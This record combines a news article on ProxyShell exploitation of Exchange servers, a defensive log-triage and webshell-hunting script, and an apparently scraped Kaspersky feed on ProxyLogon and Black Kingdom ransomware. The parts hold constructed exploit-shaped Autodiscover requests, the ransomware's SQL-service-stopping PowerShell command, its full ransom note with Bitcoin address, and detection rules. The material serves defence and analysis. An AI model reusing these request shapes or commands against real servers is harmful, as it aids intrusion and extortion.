Threat actors are actively carrying out opportunistic [scanning](<https://twitter.com/bad_packets/status/1425598895569006594>) and [exploitation](<https://twitter.com/GossiTheDog/status/1425844380376735746>) of Exchange servers using a new exploit chain leveraging a trio of flaws affecting on-premises installations, making them the latest set of bugs after ProxyLogon vulnerabilities were exploited en masse at the start of the year.
The remote code execution flaws have been collectively dubbed "ProxyShell." At least 30,000 machines are affected by the vulnerabilities, [according](<https://isc.sans.edu/diary/27732>) to a Shodan scan performed by Jan Kopriva of SANS Internet Storm Center.
"Started to see in the wild exploit attempts against our honeypot infrastructure for the Exchange ProxyShell vulnerabilities," NCC Group's Richard Warren [tweeted](<https://twitter.com/buffaloverflow/status/1425831100157349890>), noting that one of the intrusions resulted in the deployment of a "C# aspx webshell in the /aspnet_client/ directory."
Patched in early March 2021, [ProxyLogon](<https://devco.re/blog/2021/08/06/a-new-attack-surface-on-MS-exchange-part-1-ProxyLogon/>) is the moniker for CVE-2021-26855, a pre-authentication server-side request forgery vulnerability in Exchange Server that lets an attacker reach the backend with the privileges of the Exchange server itself, effectively impersonating an administrator, and which can be chained with CVE-2021-27065, a post-authentication arbitrary-file-write vulnerability, to achieve code execution.
The vulnerabilities came to light after Microsoft [spilled the beans](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) on a Beijing-sponsored hacking operation that leveraged the weaknesses to strike entities in the U.S. for purposes of exfiltrating information in what the company described as limited and targeted attacks.
Since then, Microsoft has fixed six more flaws in its mail server component, two of which, CVE-2021-31195 and CVE-2021-31196, make up [ProxyOracle](<https://devco.re/blog/2021/08/06/a-new-attack-surface-on-MS-exchange-part-2-ProxyOracle/>), a chain that lets an adversary recover a user's password in plaintext.
The three remaining issues, known collectively as ProxyShell, chain together: CVE-2021-34473, a pre-authentication path confusion in the Autodiscover front end that bypasses ACL controls; CVE-2021-34523, an elevation of privilege on the Exchange PowerShell backend that lets the unauthenticated attacker run Exchange PowerShell cmdlets while impersonating an Exchange user; and CVE-2021-31207, a post-authentication arbitrary file write that turns that access into remote code execution. Microsoft noted that CVE-2021-34473 and CVE-2021-34523 were fixed in April but inadvertently omitted from publication until July.
**ProxyLogon:**
* [**CVE-2021-26855**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) - Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)
* [**CVE-2021-26857**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) - Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)
* [**CVE-2021-26858**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) - Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)
* [**CVE-2021-27065**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) - Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)
**ProxyOracle:**
* [**CVE-2021-31195**](<https://thehackernews.com/2021/05/latest-microsoft-windows-updates-patch.html>) - Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on May 11)
* [**CVE-2021-31196**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31196>) - Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on July 13)
**ProxyShell:**
* [**CVE-2021-31207**](<https://thehackernews.com/2021/05/latest-microsoft-windows-updates-patch.html>) - Microsoft Exchange Server Security Feature Bypass Vulnerability (Patched on May 11)
* [**CVE-2021-34473**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) - Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on April 13, advisory released on July 13)
* [**CVE-2021-34523**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) - Microsoft Exchange Server Elevation of Privilege Vulnerability (Patched on April 13, advisory released on July 13)
**Other:**
* [**CVE-2021-33768**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33768>) - Microsoft Exchange Server Elevation of Privilege Vulnerability (Patched on July 13)
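As an added example (not code from the article, Microsoft or DEVCORE), the Python script below shows how a responder would triage an on-premises server against the ProxyShell chain listed above: it tags ProxyShell-shaped requests in IIS W3C logs, one stage per CVE, and lists .aspx files dropped into web-served directories after a cut-off, such as the /aspnet_client/ webshell NCC Group observed. The log lines, addresses, hostname and token are constructed for the example; the request indicators ("@" inside the autodiscover.json query, X-Rps-CAT on a PowerShell request) are the publicly documented ones rather than something the article itself describes, and the aspnet_client rule assumes no legitimate .aspx page lives under that path.

```python
"""Added example, not code from the article, Microsoft or DEVCORE: two triage helpers
for a responder hunting ProxyShell on an on-premises Exchange server. parse_w3c/scan_log
tag the request shapes each stage leaves in IIS logs; the indicators ("@" inside
autodiscover.json's query for the CVE-2021-34473 path confusion, X-Rps-CAT for the
CVE-2021-34523 backend access) are publicly documented, not from the article.
find_new_aspx lists .aspx files dropped into web-served folders after a cut-off, the
"C# aspx webshell in /aspnet_client/" the article quotes. Every log line, IP, hostname
and token here is constructed.
"""
from __future__ import annotations

import os
import tempfile
import time
from dataclasses import dataclass
from pathlib import Path
from typing import Iterable, Iterator


def parse_w3c(lines: Iterable[str]) -> Iterator[dict[str, str]]:
    """One dict per request, keyed by the '#Fields:' header. IIS writes '+' for
    spaces inside values, so splitting on ' ' is safe."""
    fields: list[str] = []
    for raw in lines:
        line = raw.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):        # skip blank, #Software, #Date
            values = line.split(" ")
            if fields and len(values) == len(fields):  # malformed line: skip, never guess
                yield dict(zip(fields, values))


@dataclass(frozen=True)
class Hit:
    stage: str
    cve: str
    client_ip: str
    request: str


def classify(entry: dict[str, str]) -> Hit | None:
    """Map one IIS request to a ProxyShell stage, or None if it looks ordinary."""
    stem = entry.get("cs-uri-stem", "").lower()
    query = entry.get("cs-uri-query", "")
    query = "" if query == "-" else query
    q, ip = query.lower(), entry.get("c-ip", "?")
    request = f"{entry.get('cs-method', '?')} {stem}" + (f"?{query}" if query else "")
    # Stage 1 (also wrapping stage 2): Autodiscover path confusion. Real clients never
    # put "@" in this query; the exploit does, so the front end strips the explicit-logon
    # prefix and proxies what is left (/mapi/nspi, /powershell) to the backend.
    if stem.endswith("/autodiscover/autodiscover.json") and "@" in query:
        if "/powershell" in q or "x-rps-cat" in q:
            return Hit("2-powershell-backend", "CVE-2021-34523", ip, request)
        return Hit("1-acl-bypass", "CVE-2021-34473", ip, request)
    if "/powershell" in stem and "x-rps-cat" in q:            # stage 2 without the wrapper
        return Hit("2-powershell-backend", "CVE-2021-34523", ip, request)
    if "/aspnet_client/" in stem and stem.endswith(".aspx"):  # nothing legitimate is .aspx here
        return Hit("3-webshell-access", "CVE-2021-31207", ip, request)
    return None


def scan_log(text: str) -> list[Hit]:
    return [h for e in parse_w3c(text.splitlines()) if (h := classify(e))]


def find_new_aspx(roots: Iterable[Path], since_epoch: float) -> list[Path]:
    """.aspx files under the web roots modified at/after since_epoch; Exchange's own
    pages predate the incident, so anything newer is a candidate to hash and read."""
    found = [p for root in map(Path, roots) if root.is_dir()
             for p in root.rglob("*.aspx")
             if p.is_file() and p.stat().st_mtime >= since_epoch]
    return sorted(found)


SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2021-08-12 10:15:01 10.0.0.5 GET /owa/ - 443 - 203.0.113.7 Mozilla/5.0 200
2021-08-12 10:15:02 10.0.0.5 GET /autodiscover/autodiscover.json @example.invalid/mapi/nspi/?&Email=autodiscover/autodiscover.json%3f@example.invalid 443 - 198.51.100.23 python-requests/2.26.0 200
2021-08-12 10:15:03 10.0.0.5 POST /autodiscover/autodiscover.json @example.invalid/powershell?X-Rps-CAT=PLACEHOLDER&Email=autodiscover/autodiscover.json%3f@example.invalid 443 - 198.51.100.23 python-requests/2.26.0 200
2021-08-12 10:16:40 10.0.0.5 GET /aspnet_client/shell.aspx - 443 - 198.51.100.23 Mozilla/5.0 200
2021-08-12 10:17:00 10.0.0.5 POST /autodiscover/autodiscover.json - 443 - 203.0.113.9 Microsoft+Office/16.0 401
"""


def demo_webshell_hunt() -> list[str]:
    """Constructed demo: one product page backdated a day, one fresh page; only the fresh one returns."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "aspnet_client"
        (root / "system_web").mkdir(parents=True)
        cutoff = time.time()
        old = root / "system_web" / "legit.aspx"
        old.write_text("<%-- shipped with the product --%>")
        os.utime(old, (cutoff - 86400, cutoff - 86400))
        fresh = root / "shell.aspx"
        fresh.write_text('<%@ Page Language="C#" %>')   # stand-in for the dropped shell
        os.utime(fresh, (cutoff + 60, cutoff + 60))
        return [p.relative_to(tmp).as_posix() for p in find_new_aspx([root], cutoff)]
```

Point `scan_log` at the real IIS log files (by default under `%SystemDrive%\inetpub\logs\LogFiles`) and `find_new_aspx` at the Exchange front-end web roots. Group hits by `c-ip`: one address walking stages 1, 2 and 3 in sequence is the full chain rather than opportunistic scanning, and any .aspx the hunt returns should be hashed and preserved before it is removed.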
Originally demonstrated at the [Pwn2Own hacking competition](<https://thehackernews.com/2021/04/windows-ubuntu-zoom-safari-ms-exchange.html>) this April, technical details of the ProxyShell attack chain were disclosed by DEVCORE researcher Orange Tsai at the [Black Hat USA 2021](<https://www.blackhat.com/us-21/briefings/schedule/index.html#proxylogon-is-just-the-tip-of-the-iceberg-a-new-attack-surface-on-microsoft-exchange-server-23442>) and [DEF CON](<https://www.youtube.com/watch?v=5mqid-7zp8k>) security conferences last week. To prevent exploitation, organizations are strongly advised to install the security updates released by Microsoft. Two caveats matter when checking coverage: the two pre-authentication bugs were fixed in the April 2021 security update (KB5001779) but CVE-2021-31207 only in the May 2021 update (KB5003435), so a server needs the May update or later to be protected against the whole chain; and Exchange security updates only install on a currently supported Cumulative Update, so a server left on an older CU cannot take them and stays exposed. Because the AdminDisplayVersion reported by Get-ExchangeServer reflects only the CU build, confirm the update level from the file version of ExSetup.exe or with Microsoft's Exchange Server Health Checker script.
Source: The Hacker News, "Hackers Actively Searching for Unpatched Microsoft Exchange Servers", published 2021-08-13, https://thehackernews.com/2021/08/hackers-actively-searching-for.html. CVEs referenced: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-31195, CVE-2021-31196, CVE-2021-31207, CVE-2021-33768, CVE-2021-34473, CVE-2021-34523.
{"securelist": [{"lastseen": "2021-03-10T12:32:23", "description": "\n\n## What happened?\n\nOn March 2, 2021 several companies [released](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) [reports](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) about in-the-wild exploitation of zero-day vulnerabilities inside Microsoft Exchange Server. The following vulnerabilities allow an attacker to compromise a vulnerable Microsoft Exchange Server. As a result, an attacker will gain access to all registered email accounts, or be able to execute arbitrary code (remote code execution or RCE) within the Exchange Server context. In the latter case, the attacker will also be able to achieve persistence on the infected server.\n\nA total of four vulnerabilities were uncovered:\n\n 1. [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>). Server-side request forgery (SSRF) allows an attacker without authorization to query the server with a specially constructed request that will cause remote code execution. The exploited server will then forward the query to another destination. \n 2. [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) caused by unsafe data deserialization inside the Unified Messaging service. Potentially allows an attacker to execute arbitrary code (RCE). As a result of insufficient control over user files, an attacker is able to forge a body of data query, and trick the high-privilege service into executing the code.\n 3. [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>). This vulnerability allows an authorized Exchange user to overwrite any existing file inside the system with their own data. To do so, the attacker has to compromise administrative credentials or exploit another vulnerability such as SSRF CVE-2021-26855.\n 4. 
[CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) is similar to CVE-2021-26858 and allows an authorized attacker to overwrite any system file on the Exchange server. \n\nKaspersky [Threat Intelligence](<https://www.kaspersky.com/enterprise-security/threat-intelligence>) shows that these vulnerabilities are already used by cybercriminals around the world.\n\n_Geography of attacks with mentioned MS Exchange vulnerabilities (based on KSN statistics) ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/04171325/microsoft_exchange_expoit_map.png>))_\n\nWe predict with a high degree of confidence that this is just the beginning, and we anticipate numerous exploitation attempts with the purpose of gaining access to resources inside corporate perimeters. Furthermore, we should note that there is typically a high risk of [ransomware](<https://securelist.com/targeted-ransomware-encrypting-data/99255/>) infection and/or data theft connected to such attacks. \n\n## How to protect against this threat?\n\nOur products protect against this threat with [Behavior Detection](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>) and [Exploit Prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) components and detect exploitation with the following verdict: PDM:Exploit.Win32.Generic \nWe detect the relevant exploits with the following detection names:\n\n * Exploit.Win32.CVE-2021-26857.gen\n * HEUR:Exploit.Win32.CVE-2021-26857.a\n\nWe also detect and block the payloads (backdoors) being used in the exploitation of these vulnerabilities, according to our Threat Intelligence. 
Possible detection names include (but are not limited to):\n\n * HEUR:Trojan.ASP.Webshell.gen\n * HEUR:Backdoor.ASP.WebShell.gen\n * UDS:DangerousObject.Multi.Generic\n\nWe are actively monitoring the situation and additional detection logic will be released with updatable databases when required.\n\nOur [Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>) helps to identify attacks in early stages by marking such suspicious actions with special IoA tags (and creating corresponding alerts). For example, here is PowerShell started by the IIS worker process (w3wp.exe) as a result of vulnerability exploitation: \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/07094546/microsoft_exchange_expoit_edr.png>)\n\nOur [Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) service is also able to identify and stop this attack by using threat hunting rules to spot the exploitation itself, as well as possible payload activity.\n\nA thorough analysis of the attack will soon be available through the APT Intelligence Reporting service; please contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>) for details.\n\n## Recommendations\n\n * As Microsoft has already released an update to fix all these vulnerabilities, we strongly recommend updating Exchange Server as soon as possible.\n * Focus your defense strategy on detecting lateral movements and data exfiltration to the internet. Pay special attention to outgoing traffic to detect cybercriminal connections. Back up data regularly. 
Make sure you can quickly access it in an emergency.\n * Use solutions like [Kaspersky Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>) and the [Kaspersky Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) service which help to identify and stop the attack in the early stages, before the attackers achieve their goals.\n * Use a reliable endpoint security solution such as Kaspersky Endpoint Security for Business that is powered by exploit prevention, behavior detection and a remediation engine that is able to roll back malicious actions. KESB also has self-defense mechanisms that can prevent its removal by cybercriminals.", "cvss3": {}, "published": "2021-03-04T17:20:57", "type": "securelist", "title": "Zero-day vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-04T17:20:57", "id": "SECURELIST:403B2D76CFDBDAB0862F6860A95E54B4", "href": "https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-06-17T10:31:39", "description": "\n\nBlack Kingdom ransomware appeared on the scene back in 2019, but we observed some activity again in 2021. The ransomware was used by an unknown adversary for exploiting a Microsoft Exchange vulnerability (CVE-2021-27065).\n\nThe complexity and sophistication of the Black Kingdom family cannot bear a comparison with other Ransomware-as-a-Service (RaaS) or Big Game Hunting (BGH) families. The ransomware is coded in Python and compiled to an executable using PyInstaller; it supports two encryption modes: one generated dynamically and one using a hardcoded key. 
Code analysis revealed an amateurish development cycle and a possibility to recover files encrypted with Black Kingdom with the help of the hardcoded key. The industry already [provided a script](<https://blog.cyberint.com/black-kingdom-ransomware>) to recover encrypted files in case they were encrypted with the embedded key.\n\n## Background\n\nThe use of a ransomware family dubbed Black Kingdom in a campaign that exploited the CVE-2021-27065 Microsoft Exchange vulnerability known as [ProxyLogon](<https://proxylogon.com/>) was [publicly reported](<https://twitter.com/vikas891/status/1373282066603859969>) at the end of March.\n\nAround the same time, we published a story on another ransomware family used by the attackers after successfully exploiting vulnerabilities in Microsoft Exchange Server. The ransomware family was DearCry.\n\nAnalysis of Black Kingdom revealed that, compared to others, it is an amateurish implementation with several mistakes and a critical encryption flaw that could allow decrypting the files due to the use of a hardcoded key. Black Kingdom is not a new player: it was observed in action following other vulnerability exploitations in 2020, such as CVE-2019-11510.\n\n**Date** | **CVE** | **Product affected** \n---|---|--- \nJune 2020 | CVE-2019-11510 | Pulse Secure \nMarch 2021 | CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065 | Microsoft Exchange Server \n \n## Technical analysis\n\n### Delivery methods\n\nBlack Kingdom's past activity indicates that the ransomware was used in larger vulnerability exploitation campaigns related to Pulse Secure or Microsoft Exchange. [Public reports](<https://twitter.com/malwaretechblog/status/1373648027609657345>) indicated that the adversary behind the campaign, after successfully exploiting the vulnerability, installed a webshell in the compromised system. 
The webshell enabled the attacker to execute arbitrary commands, such as a PowerShell script for downloading and running the Black Kingdom executable.\n\n### Sleep parameters\n\nThe ransomware can be executed without parameters and will start to encrypt the system; however, it is possible to run Black Kingdom with a numeric value, which it will interpret as the number of seconds to wait before starting encryption.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141438/BlackKingdom_ransomware_01.png>)\n\n**_'Sleep' parameter used as an argument_**\n\n### Ransomware is written in Python\n\nBlack Kingdom is coded in Python and compiled to an executable using PyInstaller. While analyzing the code statically, we found that most of the ransomware logic was coded into a file named _0xfff.py_. The ransomware is written in Python 3.7.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141523/BlackKingdom_ransomware_02.png>)\n\n**_Black Kingdom is coded in Python_**\n\n### Excluded directories\n\nThe adversary behind Black Kingdom specified certain folders to be excluded from encryption. The purpose is to avoid breaking the system during encryption. The list of excluded folders is available in the code:\n\n * Windows,\n * ProgramData,\n * Program Files,\n * Program Files (x86),\n * AppData/Roaming,\n * AppData/LocalLow,\n * AppData/Local.\n\nThe code that implements this functionality demonstrates how amateurishly Black Kingdom is written. 
The developers failed to use OS environments or regex to avoid repeating the code twice.\n\n### PowerShell command for process termination and history deletion\n\nPrior to file encryption, Black Kingdom uses PowerShell to try to stop all processes in the system that contain "sql" in the name with the following command:\n \n \n Get-Service*sql*|Stop-Service-Force2>$null\n\nOnce done, Black Kingdom will delete the PowerShell history in the system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141650/BlackKingdom_ransomware_03.png>)\n\n**_PowerShell commands run by Black Kingdom_**\n\nCombined with a cleanup of system logs, this supports the theory that the attackers try to remain hidden in the system by removing all traces of their activity.\n\n### Encryption process\n\nThe static analysis of Black Kingdom shows how it generates an AES-256 key based on the following algorithm.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141733/BlackKingdom_ransomware_04.png>)\n\n**_The pseudo-algorithm used by Black Kingdom_**\n\nThe malware generates a 64-character pseudo-random string. It then takes the MD5 hash of the string and uses it as the key for AES-256 encryption.\n\nThe code contains credentials for sending the generated key to the third-party service hxxp://mega.io. 
If the connection is unsuccessful, the Black Kingdom encrypts the data with a hardcoded key available in the code.\n\nBelow is an example of a successful connection with hxxp://mega.io.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141817/BlackKingdom_ransomware_05.png>)\n\n**_Connection established with mega.io_**\n\n** **The credentials for mega.io are hardcoded in base64 and used for connecting as shown below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143025/BlackKingdom_ransomware_06.png>)\n\n**_Hardcoded credentials_**\n\nThe file sent to Mega contained the following data.\n\n**Parameter** | **Description:** \n---|--- \nID: | Generated ID for user identification \nKey: | Generated user key \nUser: | Username in the infected system \nDomain: | Domain name to which the infected user belongs \n \nBlack Kingdom will encrypt a single file if it is passed as a parameter with the key to encrypt it. This could allow the attacker to encrypt one file instead of encrypting the entire system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143102/BlackKingdom_ransomware_07.png>)\n\n**_Function for encrypting a single file_**\n\nIf no arguments are used, the ransomware will start to enumerate files in the system and then encrypt these with a ten-threaded process. It performs the following basic operations:\n\n 1. Read the file,\n 2. Overwrite it with an encrypted version,\n 3. Rename the file.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143137/BlackKingdom_ransomware_08.png>)\n\n**_The function used for encrypting the system_**\n\nBlack Kingdom allows reading a file in the same directory called target.txt, which will be used by the ransomware to recursively collect files for the collected directories specified in that file and then encrypt them. Black Kingdom will also enumerate various drive letters and encrypt them. 
A rescue note will be delivered for each encrypted directory.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143222/BlackKingdom_ransomware_09.png>)\n\n**_Rescue note used by the ransomware_**\n\n### Encryption mistakes\n\nAmateur ransomware developers often end up making mistakes that can help decryption, e.g., poor implementation of the encryption key, or, conversely, make recovery impossible even after the victim pays for a valid decryptor. Black Kingdom will try to upload the generated key to Mega, and if this fails, use a hardcoded key to encrypt the files. If the files have been encrypted and the system has not been able to make a connection to Mega, it will be possible to recover the files using the hardcoded keys.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143256/BlackKingdom_ransomware_10.png>)\n\n**_Hardcoded key in Base64_**\n\nWhile analyzing the code statically, we examined the author's implementation of file encryption and found several mistakes that could affect victims directly. During the encryption process, Black Kingdom does not check whether the file is already encrypted or not. Other popular ransomware families normally add a specific extension or a marker to all encrypted files. However, if the system has been infected by Black Kingdom twice, files in the system will be encrypted twice, too, which may prevent recovery with a valid encryption key.\n\n### System log cleanup\n\nA feature of Black Kingdom is the ability to clean up system logs with a single Python function.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143334/BlackKingdom_ransomware_11.png>)\n\n**_The function that cleans up system logs_**\n\nThis operation will result in Application, Security, and System event viewer logs being deleted. 
The purpose is to remove any history of ransomware activity, exploitation, and privilege escalation.\n\n### Ransomware note\n\nBlack Kingdom changes the desktop background to a note that the system is infected while it encrypts files, disabling the mouse and keyboard with pyHook as it does so.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143409/BlackKingdom_ransomware_12.png>)\n\n**_Function to hook the mouse and keyboard_**\n\nWritten in English, the note contains several mistakes. All Black Kingdom notes contain the same Bitcoin address, which sets it apart from other ransomware families, which provide a unique address to each victim.\n \n \n ***************************\n | We Are Back ?\n ***************************\n \n We hacked your (( Network )), and now all files, documents, images,\n databases and other important data are safely encrypted using the strongest algorithms ever.\n You cannot access any of your files or services .\n But do not worry. You can restore everthing and get back business very soon ( depends on your actions )\n \n before I tell how you can restore your data, you have to know certain things :\n \n We have downloaded most of your data ( especially important data ) , and if you don't contact us within 2 days, your data will be released to the public.\n \n To see what happens to those who didn't contact us, just google : ( Blackkingdom Ransomware )\n \n ***************************\n | What guarantees ?\n ***************************\n \n We understand your stress and anxiety. 
So you have a free opportunity to test our service by instantly decrypting one or two files for free\n just send the files you want to decrypt to (support_blackkingdom2@protonmail.com\n \n ***************************************************\n | How to contact us and recover all of your files ?\n ***************************************************\n \n The only way to recover your files and protect from data leaks, is to purchase a unique private key for you that we only posses .\n \n \n [ + ] Instructions:\n \n 1- Send the decrypt_file.txt file to the following email ===> support_blackkingdom2@protonmail.com\n \n 2- send the following amount of US dollars ( 10,000 ) worth of bitcoin to this address :\n \n [ 1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT ]\n \n 3- confirm your payment by sending the transfer url to our email address\n \n 4- After you submit the payment, the data will be removed from our servers, and the decoder will be given to you,\n so that you can recover all your files.\n \n ## Note ##\n \n Dear system administrators, do not think you can handle it on your own. 
Notify your supervisors as soon as possible.\n By hiding the truth and not communicating with us, what happened will be published on social media and yet in news websites.\n \n Your ID ==>\n FDHJ91CUSzXTquLpqAnP\n\nThe associated Bitcoin address is currently showing just two transactions.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143451/BlackKingdom_ransomware_13.png>)\n\n**_Transactions made to a Bitcoin account_**\n\n### Code analysis\n\nAfter decompiling the Python code, we found that the code base for Black Kingdom has its origins in an open-source ransomware builder [available on Github](<https://github.com/BuchiDen/Ransomware_RAASNet/blob/master/RAASNet.py>).\n\nThe adversary behind Black Kingdom adapted parts of the code, adding features that were not originally present in the builder, such as the hardcoded key or communication with the mega.io domain.\n\n## Victims\n\nBased on our telemetry we could see only a few hits by Black Kingdom in Italy and Japan.\n\n## Attribution\n\nWe could not attribute Black Kingdom to any known adversary in our case analysis. Its involvement in the Microsoft Exchange exploitation campaign suggests opportunism, rather than a resurgence in activity from this ransomware family.\n\nFor more information please contact: [financialintel@kaspersky.com](<mailto:financialintel@kaspersky.com>)\n\n## Appendix I \u2013 Indicators of Compromise\n\n**_Note:_**_ The indicators in this section were valid at the time of publication. 
Any future changes will be directly updated in the corresponding .ioc file._\n\n**File Hashes**\n\nb9dbdf11da3630f464b8daace88e11c374a642e5082850e9f10a1b09d69ff04f \nc4aa94c73a50b2deca0401f97e4202337e522be3df629b3ef91e706488b64908 \na387c3c5776ee1b61018eeb3408fa7fa7490915146078d65b95621315e8b4287 \n815d7f9d732c4d1a70cec05433b8d4de75cba1ca9caabbbe4b8cde3f176cc670 \n910fbfa8ef4ad7183c1b5bdd3c9fd1380e617ca0042b428873c48f71ddc857db \n866b1f5c5edd9f01c5ba84d02e94ae7c1f9b2196af380eed1917e8fc21acbbdc \nc25a5c14269c990c94a4a20443c4eb266318200e4d7927c163e0eaec4ede780a\n\n**Domain:**\n\nhxxp://yuuuuu44[.]com/vpn-service/$(f1)/crunchyroll-vpn\n\n**YARA rules:**\n \n \n import \"hash\"\n import \"pe\"\n rule ransomware_blackkingdom {\n \n meta:\n \n description = \"Rule to detect Black Kingdom ransomware\"\n author = \"Kaspersky Lab\"\n copyright = \"Kaspersky Lab\"\n distribution = \"DISTRIBUTION IS FORBIDDEN. DO NOT UPLOAD TO ANY MULTISCANNER OR SHARE ON ANY THREAT INTEL PLATFORM\"\n version = \"1.0\"\n last_modified = \"2021-05-02\"\n hash = \"866b1f5c5edd9f01c5ba84d02e94ae7c1f9b2196af380eed1917e8fc21acbbdc\"\n hash = \"910fbfa8ef4ad7183c1b5bdd3c9fd1380e617ca0042b428873c48f71ddc857db\"\n \n condition:\n \n hash.sha256(pe.rich_signature.clear_data) == \"0e7d0db29c7247ae97591751d3b6c0728aed0ec1b1f853b25fc84e75ae12b7b8\"\n }\n\n## Appendix II \u2013 MITRE ATT&CK Mapping\n\nThis table contains all TTPs identified during the analysis of the activity described in this report.\n\n**Tactic** | **Technique.** | **Technique Name. 
** \n---|---|--- \n**Execution** | **T1047** | **Windows Management Instrumentation** \n**T1059** | **Command and Scripting Interpreter** \n**T1106** | **Native API** \n**Persistence** | **T1574.002** | **DLL Side-Loading** \n**T1546.011** | **Application Shimming** \n**T1547.001** | **Registry Run Keys / Startup Folder** \n**Privilege Escalation** | **T1055** | **Process Injection** \n**T1574.002** | **DLL Side-Loading** \n**T1546.011** | **Application Shimming** \n**T1134** | **Access Token Manipulation** \n**T1547.001** | **Registry Run Keys / Startup Folder** \n**Defense Evasion** | **T1562.001** | **Disable or Modify Tools** \n**T1140** | **Deobfuscate/Decode Files or Information** \n**T1497** | **Virtualization/Sandbox Evasion** \n**T1027** | **Obfuscated Files or Information** \n**T1574.002** | **DLL Side-Loading** \n**T1036** | **Masquerading** \n**T1134** | **Access Token Manipulation** \n**T1055** | **Process Injection** \n**Credential Access** | **T1056** | **Input Capture** \n**Discovery** | **T1083** | **File and Directory Discovery** \n**T1082** | **System Information Discovery** \n**T1497** | **Virtualization/Sandbox Evasion** \n**T1012** | **Query Registry** \n**T1518.001** | **Security Software Discovery** \n**T1057** | **Process Discovery** \n**T1018** | **Remote System Discovery** \n**T1016** | **System Network Configuration Discovery** \n**Collection** | **T1560** | **Archive Collected Data** \n**T1005** | **Data from Local System** \n**T1114** | **Email Collection** \n**T1056** | **Input Capture** \n**Command and Control** | **T1573** | **Encrypted Channel** \n**Impact** | **T1486** | **Data Encrypted for Impact**", "cvss3": {}, "published": "2021-06-17T10:00:41", "type": "securelist", "title": "Black Kingdom ransomware", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-06-17T10:00:41", "id": 
